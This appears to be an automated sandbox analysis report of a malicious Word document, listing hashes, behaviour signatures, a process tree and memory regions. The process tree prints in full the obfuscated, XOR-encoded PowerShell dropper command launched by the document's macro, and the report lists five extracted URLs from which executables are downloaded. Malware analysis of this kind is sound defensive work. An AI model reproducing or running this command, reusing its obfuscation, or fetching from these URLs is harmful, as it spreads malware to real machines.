Analysis

  • max time kernel
    121s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    05/05/2024, 07:51

General

  • Target

    16b168cfd7f2eefeb02c3e3aa04083e8_JaffaCakes118.doc

  • Size

    111KB

  • MD5

    16b168cfd7f2eefeb02c3e3aa04083e8

  • SHA1

    522988ade052d51b5dfde5d376effb4a3e693194

  • SHA256

    0897bfaf976453945d5a85cd06dce30ed4056a7ed11e84eba631f3d1076d1022

  • SHA512

    601c4d7c8b0c89a2a78553eeff1aff2c826e0428667b379119620847364ba7a69b56bfcd768dd769a5d50bd6d2d8ca35b482dbf3df2a09cc38369a79c15d6817

  • SSDEEP

    1536:wHsddAm5zdI3Al+aguWKj7jnBz0tuNfEltl2S:323Albj77p4uilWS

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://dancod.com/wp-content/rFTSz/

exe.dropper

http://cocohou.com.au/auogHR/

exe.dropper

http://aifesdespets.fr/v4J6/

exe.dropper

http://christinelebeck.com/86Q9/

exe.dropper

http://www.payplus.vn/asTCL6t/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\16b168cfd7f2eefeb02c3e3aa04083e8_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2684
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2972
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\POwerSHell.exe
        POwerSHell ('23H97H112E80H97>94P120~19R14H19H93>86y68~30R92!81H89H86c80H71E19c65E82E93~87~92R94c8>23x105R92x123E118~67y19y14y19E93P86>68c30R92P81E89P86H80R71!19P96>74>64R71E86c94x29~125c86>71x29x100>86R81>112H95!90H86R93y71P8!23E90E98y89c101!113>19y14P19y20R91>71H71~67P9R28~28x87R82>93x80P92x87P29c80~92P94c28P68R67~30P80>92~93!71R86~93>71R28y65x117P103c96R73y28H115H91P71!71P67>9E28y28H80c92y80x92E91H92H70!29!80~92!94c29>82x70c28y82P70y92y84>123!97y28!115y91E71P71c67~9P28~28E82y90P85R86x64~87R86!64R67P86P71H64H29H85E65~28E69y7>121>5P28!115>91E71H71P67H9E28c28!80R91~65E90c64R71H90H93c86P95!86R81y86c80y88>29H80x92c94~28x11>5c98x10!28!115E91>71y71>67~9~28P28P68>68c68y29P67c82c74!67E95c70P64!29!69x93H28~82~64H103E112!127c5~71!28c20~29!96c67y95R90E71y27y20!115>20~26P8y23R116H65E119R125E98~107~19H14c19~23!97c112R80y97>94!120x29~93!86E75~71c27E2H31c19x10>10x7~0y11H4R26P8x23y94E87E66>123E91H19x14>19c23P86!93c69x9!71y86c94H67c19>24P19H20~111!20c19>24P19c23E116H65P119H125~98~107E19x24~19~20c29c86R75~86>20x8E85H92>65x86c82y80>91>27~23!126H93c68y66y116H19H90!93x19H23R90!98~89c101~113~26H72R71P65E74c72!23~105~92E123H118c67!29R119E92>68!93!95P92P82!87y117!90y95y86!27P23~126P93H68P66x116E29c103H92~96c71c65H90P93R84y27x26E31P19~23P94R87R66!123x91R26~8R96P71R82~65H71P30H99R65R92x80x86x64E64!19H23y94P87c66!123~91!8y81P65E86P82y88E8c78x80y82>71x80R91y72!68>65>90H71~86~30c91x92~64~71>19!23E108>29~118P75H80>86H67H71>90>92P93P29x126>86y64P64>82x84~86H8R78H78'.spLit( '!~ER>cHxPy')|ForEacH-OBJeCT{[ChaR]( $_ -bxor "0x33")} ) -JOin ''| .( $env:comsPEC[4,26,25]-JOin'')
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2724

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      73861487d70e9ea6d065a38f89bd3396

      SHA1

      ee3675986fe3ffeaa83282adc5fdbd97567a5154

      SHA256

      cafd96be8fc6091b2436daae3d3adfe8dad879fc6a70875f07df8067e599e724

      SHA512

      ea6a62361b87e97c2afbc0a638ac17a94933535ff6ae139ba9a92d62d1e6c9ebea9afd26230a50ec417ee9f9932bdcfbc7f9a339e0c2d5e01704957635fc56e5

    • memory/2684-81-0x0000000006380000-0x0000000006480000-memory.dmp

      Filesize

      1024KB

    • memory/2684-2-0x000000007155D000-0x0000000071568000-memory.dmp

      Filesize

      44KB

    • memory/2684-24-0x0000000006380000-0x0000000006480000-memory.dmp

      Filesize

      1024KB

    • memory/2684-25-0x0000000006380000-0x0000000006480000-memory.dmp

      Filesize

      1024KB

    • memory/2684-91-0x0000000006380000-0x0000000006480000-memory.dmp

      Filesize

      1024KB

    • memory/2684-0-0x000000002FDF1000-0x000000002FDF2000-memory.dmp

      Filesize

      4KB

    • memory/2684-80-0x0000000006380000-0x0000000006480000-memory.dmp

      Filesize

      1024KB

    • memory/2684-99-0x000000007155D000-0x0000000071568000-memory.dmp

      Filesize

      44KB

    • memory/2684-100-0x0000000006380000-0x0000000006480000-memory.dmp

      Filesize

      1024KB

    • memory/2684-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2684-115-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2684-116-0x000000007155D000-0x0000000071568000-memory.dmp

      Filesize

      44KB